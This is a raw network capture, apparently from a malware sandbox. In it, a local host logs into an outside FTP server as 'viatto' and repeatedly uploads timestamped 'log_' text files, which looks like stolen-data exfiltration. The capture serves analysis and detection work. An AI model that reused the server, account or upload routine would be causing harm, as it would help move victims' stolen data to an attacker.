                                                                                                                                    Oct 10, 2022 06:03:10.198688030 CEST2149911185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:10.199301958 CEST2149911185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:10.199464083 CEST4991121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:10.222392082 CEST2149911185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:10.222668886 CEST4991121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:10.245559931 CEST2149911185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:10.245881081 CEST4991121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:10.269043922 CEST2149911185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:10.269486904 CEST4991121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:10.292716026 CEST2149911185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:10.293369055 CEST4991121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:10.317441940 CEST2149911185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:10.319741964 CEST4991121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:10.343127966 CEST2149911185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,121)
                                                                                                                                    Oct 10, 2022 06:03:10.371814013 CEST4991121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.45.txt
                                                                                                                                    Oct 10, 2022 06:03:10.395715952 CEST2149911185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:10.426841974 CEST2149911185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:10.633044004 CEST2149913185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:10.633095026 CEST2149913185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:10.633244991 CEST2149913185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:10.633579969 CEST4991321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:10.656743050 CEST2149913185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:10.657192945 CEST4991321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:10.680694103 CEST2149913185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:10.681225061 CEST4991321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:10.708122969 CEST2149913185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:10.708537102 CEST4991321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:10.731864929 CEST2149913185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:10.732419014 CEST4991321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:10.755249977 CEST2149913185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:10.756551027 CEST4991321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:10.779664993 CEST2149913185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,122)
                                                                                                                                    Oct 10, 2022 06:03:10.807286024 CEST4991321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.46.txt
                                                                                                                                    Oct 10, 2022 06:03:10.832504988 CEST2149913185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:10.858346939 CEST2149913185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:11.067480087 CEST2149915185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:11.067651987 CEST2149915185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:11.067678928 CEST2149915185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:11.067879915 CEST4991521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:11.092359066 CEST2149915185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:11.092749119 CEST4991521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:11.117309093 CEST2149915185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:11.117580891 CEST4991521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:11.143291950 CEST2149915185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:11.145221949 CEST4991521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:11.170382023 CEST2149915185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:11.170844078 CEST4991521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:11.194125891 CEST2149915185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:11.195378065 CEST4991521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:11.220761061 CEST2149915185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,123)
                                                                                                                                    Oct 10, 2022 06:03:11.245197058 CEST4991521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.47.txt
                                                                                                                                    Oct 10, 2022 06:03:11.270369053 CEST2149915185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:11.298958063 CEST2149915185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:11.500184059 CEST2149917185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:11.500261068 CEST2149917185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:11.500524044 CEST2149917185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:11.500682116 CEST4991721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:11.527517080 CEST2149917185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:11.527832031 CEST4991721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:11.555452108 CEST2149917185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:11.557845116 CEST4991721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:11.587594986 CEST2149917185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:11.598437071 CEST4991721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:11.626976967 CEST2149917185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:11.627546072 CEST4991721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:11.655088902 CEST2149917185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:11.658727884 CEST4991721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:11.687678099 CEST2149917185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,124)
                                                                                                                                    Oct 10, 2022 06:03:11.722711086 CEST4991721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.49.txt
                                                                                                                                    Oct 10, 2022 06:03:11.749396086 CEST2149917185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:11.779541016 CEST2149917185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:12.005099058 CEST2149919185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:12.005161047 CEST2149919185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:12.005198002 CEST2149919185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:12.005568981 CEST4991921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:12.028429031 CEST2149919185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:12.028892040 CEST4991921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:12.051625013 CEST2149919185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:12.055231094 CEST4991921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:12.078092098 CEST2149919185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:12.083718061 CEST4991921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:12.106887102 CEST2149919185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:12.110186100 CEST4991921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:12.132807016 CEST2149919185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:12.138104916 CEST4991921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:12.161637068 CEST2149919185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,125)
                                                                                                                                    Oct 10, 2022 06:03:12.187956095 CEST4991921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.50.txt
                                                                                                                                    Oct 10, 2022 06:03:12.211308956 CEST2149919185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:12.238184929 CEST2149919185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:12.442379951 CEST2149921185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:12.442442894 CEST2149921185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:12.442478895 CEST2149921185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:12.456127882 CEST4992121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:12.482152939 CEST2149921185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:12.486068010 CEST4992121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:12.514909983 CEST2149921185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:12.516359091 CEST4992121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:12.542100906 CEST2149921185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:12.547245979 CEST4992121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:12.571882010 CEST2149921185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:12.577778101 CEST4992121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:12.603218079 CEST2149921185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:12.604971886 CEST4992121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:12.635162115 CEST2149921185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,127)
                                                                                                                                    Oct 10, 2022 06:03:12.659868002 CEST4992121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.51.txt
                                                                                                                                    Oct 10, 2022 06:03:12.686774015 CEST2149921185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:12.715548992 CEST2149921185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:12.910134077 CEST2149923185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:12.910187960 CEST2149923185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:12.910219908 CEST2149923185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:12.911664009 CEST4992321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:12.937161922 CEST2149923185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:12.937458038 CEST4992321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:12.963339090 CEST2149923185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:12.963747978 CEST4992321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:12.989348888 CEST2149923185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:12.989794970 CEST4992321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:13.015182018 CEST2149923185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:13.018210888 CEST4992321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:13.042220116 CEST2149923185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:13.043302059 CEST4992321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:13.070323944 CEST2149923185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,128)
                                                                                                                                    Oct 10, 2022 06:03:13.093935013 CEST4992321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.52.txt
                                                                                                                                    Oct 10, 2022 06:03:13.121982098 CEST2149923185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:13.153770924 CEST2149923185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:13.346189976 CEST2149925185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:13.346247911 CEST2149925185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:13.346286058 CEST2149925185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:13.346585035 CEST4992521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:13.371298075 CEST2149925185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:13.371748924 CEST4992521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:13.397743940 CEST2149925185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:13.398402929 CEST4992521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:13.423547983 CEST2149925185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:13.424212933 CEST4992521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:13.449412107 CEST2149925185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:13.450165987 CEST4992521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:13.476305008 CEST2149925185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:13.477332115 CEST4992521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:13.501200914 CEST2149925185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,129)
                                                                                                                                    Oct 10, 2022 06:03:13.527908087 CEST4992521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.53.txt
                                                                                                                                    Oct 10, 2022 06:03:13.555577040 CEST2149925185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:13.584939003 CEST2149925185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:13.776479959 CEST2149927185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:13.776537895 CEST2149927185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:13.777118921 CEST2149927185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:13.777282000 CEST4992721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:13.800292015 CEST2149927185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:13.800585032 CEST4992721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:13.824275970 CEST2149927185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:13.824687004 CEST4992721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:13.848337889 CEST2149927185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:13.848683119 CEST4992721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:13.872221947 CEST2149927185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:13.879168987 CEST4992721192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:13.902513981 CEST2149927185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:13.910738945 CEST4992721192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:13.934700012 CEST2149927185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,130)
                                                                                                                                    Oct 10, 2022 06:03:13.965776920 CEST4992721192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.54.txt
                                                                                                                                    Oct 10, 2022 06:03:13.990969896 CEST2149927185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:14.017648935 CEST2149927185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:14.214240074 CEST2149929185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:14.214284897 CEST2149929185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:14.214315891 CEST2149929185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:14.216638088 CEST4992921192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:14.241657972 CEST2149929185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:14.241921902 CEST4992921192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:14.265906096 CEST2149929185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:14.266665936 CEST4992921192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:14.293322086 CEST2149929185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:14.293574095 CEST4992921192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:14.317878962 CEST2149929185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:14.319221973 CEST4992921192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:14.343758106 CEST2149929185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:14.345160961 CEST4992921192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:14.369970083 CEST2149929185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,132)
                                                                                                                                    Oct 10, 2022 06:03:14.394124031 CEST4992921192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.55.txt
                                                                                                                                    Oct 10, 2022 06:03:14.419549942 CEST2149929185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:14.452219009 CEST2149929185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:14.638484955 CEST2149931185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:14.638695002 CEST2149931185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:14.638731956 CEST2149931185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:14.639214039 CEST4993121192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:14.662098885 CEST2149931185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:14.671225071 CEST4993121192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:14.694488049 CEST2149931185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:14.695072889 CEST4993121192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:14.718414068 CEST2149931185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:14.718815088 CEST4993121192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:14.742083073 CEST2149931185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:14.747879028 CEST4993121192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:14.770711899 CEST2149931185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:14.776492119 CEST4993121192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:14.799634933 CEST2149931185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,133)
                                                                                                                                    Oct 10, 2022 06:03:14.824609995 CEST4993121192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.56.txt
                                                                                                                                    Oct 10, 2022 06:03:14.848211050 CEST2149931185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:14.876455069 CEST2149931185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:15.091049910 CEST2149933185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:15.091156006 CEST2149933185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:15.091236115 CEST2149933185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:15.091969013 CEST4993321192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:15.114655972 CEST2149933185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:15.115108013 CEST4993321192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:15.137892008 CEST2149933185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:15.143162966 CEST4993321192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:15.166024923 CEST2149933185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:15.167896986 CEST4993321192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:15.191260099 CEST2149933185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:15.195513010 CEST4993321192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:15.218194962 CEST2149933185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:15.228310108 CEST4993321192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:15.251306057 CEST2149933185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,134)
                                                                                                                                    Oct 10, 2022 06:03:15.282140970 CEST4993321192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.57.txt
                                                                                                                                    Oct 10, 2022 06:03:15.306598902 CEST2149933185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:15.334953070 CEST2149933185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:15.548466921 CEST2149935185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:15.548496008 CEST2149935185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:15.548538923 CEST2149935185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:15.548949957 CEST4993521192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:15.575973988 CEST2149935185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:15.580153942 CEST4993521192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:15.608983994 CEST2149935185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:15.612304926 CEST4993521192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:15.636883020 CEST2149935185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:15.638467073 CEST4993521192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:15.663453102 CEST2149935185.106.92.60192.168.2.3550 Directory already exists
                                                                                                                                    Oct 10, 2022 06:03:15.664664984 CEST4993521192.168.2.3185.106.92.60TYPE I
                                                                                                                                    Oct 10, 2022 06:03:15.690705061 CEST2149935185.106.92.60192.168.2.3200 Type set to I
                                                                                                                                    Oct 10, 2022 06:03:15.693459034 CEST4993521192.168.2.3185.106.92.60PASV
                                                                                                                                    Oct 10, 2022 06:03:15.720006943 CEST2149935185.106.92.60192.168.2.3227 Entering Passive Mode (185,106,92,60,252,136)
                                                                                                                                    Oct 10, 2022 06:03:15.744677067 CEST4993521192.168.2.3185.106.92.60STOR //138727-user/log_2022.10.10_07.58.txt
                                                                                                                                    Oct 10, 2022 06:03:15.770870924 CEST2149935185.106.92.60192.168.2.3150 Connection accepted
                                                                                                                                    Oct 10, 2022 06:03:15.796840906 CEST2149935185.106.92.60192.168.2.3226 Transfer OK
                                                                                                                                    Oct 10, 2022 06:03:15.988606930 CEST2149937185.106.92.60192.168.2.3220-FileZilla Server version 0.9.41 beta
                                                                                                                                    Oct 10, 2022 06:03:15.988635063 CEST2149937185.106.92.60192.168.2.3220-written by Tim Kosse (Tim.Kosse@gmx.de)
                                                                                                                                    Oct 10, 2022 06:03:15.988647938 CEST2149937185.106.92.60192.168.2.3220 Please visit http://sourceforge.net/projects/filezilla/
                                                                                                                                    Oct 10, 2022 06:03:15.989022970 CEST4993721192.168.2.3185.106.92.60USER viatto
                                                                                                                                    Oct 10, 2022 06:03:16.013091087 CEST2149937185.106.92.60192.168.2.3331 Password required for viatto
                                                                                                                                    Oct 10, 2022 06:03:16.014139891 CEST4993721192.168.2.3185.106.92.60PASS
                                                                                                                                    Oct 10, 2022 06:03:16.036730051 CEST2149937185.106.92.60192.168.2.3230 Logged on
                                                                                                                                    Oct 10, 2022 06:03:16.037230015 CEST4993721192.168.2.3185.106.92.60MKD /
                                                                                                                                    Oct 10, 2022 06:03:16.059762001 CEST2149937185.106.92.60192.168.2.3550 Directoryname not valid
                                                                                                                                    Oct 10, 2022 06:03:16.061048985 CEST4993721192.168.2.3185.106.92.60MKD //138727-hardz/
                                                                                                                                    Oct 10, 2022 06:03:16.084081888 CEST2149937185.106.92.60192.168.2.3550 Directory already exists
